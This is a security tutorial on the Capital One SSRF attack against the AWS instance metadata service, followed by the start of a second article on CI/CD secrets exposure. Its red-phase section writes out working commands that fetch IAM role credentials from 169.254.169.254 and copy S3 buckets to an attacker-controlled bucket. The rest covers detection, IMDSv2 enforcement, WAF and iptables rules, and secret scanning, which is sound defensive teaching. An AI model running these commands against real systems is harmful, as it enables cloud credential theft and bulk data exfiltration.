│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.

The Incident: Capital One (2019)

In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role — standard practice, necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. AWS did not change IMDSv1 as a result — they had already released IMDSv2 in November 2019, months after the breach was discovered (July 2019). The breach timeline predates IMDSv2 availability. What it demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The revelation that the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack — in the application, in a WAF, in a sidecar, in a Lambda calling your EC2 — is a straight line to your IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.

Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-22T24:03:30Z"
}

These are real, valid AWS temporary credentials. The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid

{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0" \
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'

[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table | \
  grep -E "optional|INSTANCE"
# Any row showing "optional" is IMDSv1-exposed

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
INSTANCE_IP="10.0.1.50"  # Your instance's known IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output text | \
  jq -r 'fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == "'"${DETECTOR_ROLE}"'") |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }' | \
  jq "select(.sourceIP != \"${INSTANCE_IP}\")"
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely — meaning someone has physically exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.NetworkConnectionAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

Recon:IAMUser/UserPermissions — fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Often appears immediately before the data exfiltration events.

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs do not capture traffic to the IMDS endpoint by default — but they can capture egress from EC2 instances in ways that reveal post-exploitation. More useful for IMDS abuse is querying for unexpected source IPs calling the IMDS from within the VPC:

# Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

If you see source IPs in this query that are not your EC2 instance’s primary private IP — for example, container IPs within the pod CIDR — and you have --http-put-response-hop-limit 1 set, those requests should be failing. If they’re succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, the PUT request to obtain an IMDSv2 token has a TTL of 1. When a process running inside a container tries to reach the IMDS, the request must traverse:

Container network namespace → veth pair → host network namespace → hypervisor IMDS endpoint

That traversal decrements the TTL below 1, and the PUT request never reaches the IMDS endpoint. The token is never issued. The GET request that follows has no token and — if --http-tokens required is also set — is rejected.

Hop limit = 1:
  Container → veth → [TTL=0, packet dropped]
  IMDS never receives the PUT, never issues a token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token is issued; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity eliminates static credentials — pods get short-lived tokens scoped to their service account, not the node’s IAM role.

Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read instance_id; do
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Apply this SCP to all OUs except the management account. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity eliminates static credentials removes the entire credential from the picture — there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defence in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.

⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. AWS SDK for Java v1 and Python (boto3 < 1.9.220) do not support IMDSv2 by default. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions — that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Requires >= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default

EKS node groups and hop limit 2. If you run EKS and pods need to use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS — they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. The aws eks create-managed-node-group default is hop limit 2 for this reason; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

# EventBridge rule: alert immediately on S3 data events from unexpected sources
# (complements GuardDuty's delayed finding)
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.

Quick Reference

IMDSv1 vs IMDSv2

Attribute	IMDSv1	IMDSv2
Authentication	None — any HTTP GET works	PUT to `/latest/api/token` required first to obtain a session token
SSRF exploitable	Yes — one HTTP request returns credentials	No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL	N/A	1 second to 21,600 seconds (configurable)
Hop limit enforcement	N/A	Enforced on PUT — TTL=1 blocks containers from reaching IMDS
AWS CLI enforcement	`--http-tokens optional` (default on old instances)	`--http-tokens required`
Capital One risk	Present	Eliminated

IMDSv2 Enforcement Commands by Provider

Provider	Enforcement Command	Scope
AWS — running instance	`aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1`	Single instance
AWS — launch template	Add `"MetadataOptions": {"HttpTokens": "required"}` to launch template data	All instances from template
AWS — org SCP	Deny `ec2:RunInstances` where `ec2:MetadataHttpTokens != required`	All accounts in org
AWS — Config rule	`ec2-imdsv2-check` managed rule	Compliance audit
GCP	GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires `Metadata-Flavor: Google` header — this header cannot be set via SSRF in most frameworks	N/A
Azure	Azure IMDS requires `Metadata: true` header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)	N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.

Key Takeaways

IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
--http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
The structural solution eliminates the credential entirely: OIDC workload identity eliminates static credentials on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline

June 16, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure

TL;DR

CI/CD secrets exposure is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit
The CircleCI breach (January 2023): an engineer’s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated
The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised
The structural fix: OIDC workload identity replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate
Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers
Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit

OWASP Mapping: A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──▶ .env with AWS_SECRET_KEY              │
│   Automated scanner ──────▶  clones within 60 seconds              │
│   Attacker ───────────────▶  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──▶  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──▶  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: "Using token: ghp_xxxxxxxxxxxx..." → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

CI/CD secrets exposure is not primarily a developer discipline problem — it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens that cannot be exfiltrated because they don’t persist.

The 25-Minute Compromise: How Automated Scanning Works Against You

At 2:47 AM, a developer committed a .env file to a public GitHub repository. It contained:

DATABASE_URL=postgres://admin:prod_p@[email protected]:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub’s public event stream, looking for credential patterns in new commits, new files, and new repository forks.

At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.

GitHub now runs its own secret scanning and immediately invalidates some credential types (GitHub tokens, AWS IAM keys partnered with AWS) when detected in public repositories. This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.

The CircleCI Breach: Platform-Level Credential Exfiltration

The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:

1. CircleCI engineer's laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Database also contains the encryption keys (in accessible internal system)
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets

What was stored in CircleCI environment variables by customers:
– AWS IAM access key ID and secret access key pairs
– GitHub personal access tokens and OAuth tokens
– DockerHub credentials
– SSH private keys (for deployment access)
– Heroku API keys
– Stripe, Twilio, SendGrid API keys
– Internal service account credentials

CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.

The scale of the blast radius: Any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised. The credential was valid. The CircleCI platform’s encryption only protected against offline attacks — an attacker with internal database access and access to the key management system had everything needed to decrypt.

Red Phase: Enumerating Secrets Exposure in Your Pipeline

Scanning Repositories for Committed Secrets

# Install: pip install trufflehog3 or use the Docker image
docker run --rm \
  -v "$(pwd):/repo" \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }'

# Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan entire git history (catches secrets that were committed then deleted)
gitleaks detect \
  --source . \
  --log-opts="--all" \
  --report-format json \
  --report-path gitleaks-history.json

# Scan a specific GitHub organization's public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token "${GITHUB_TOKEN}" \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }'

Enumerating Secrets in CI/CD Platform Environment Variables

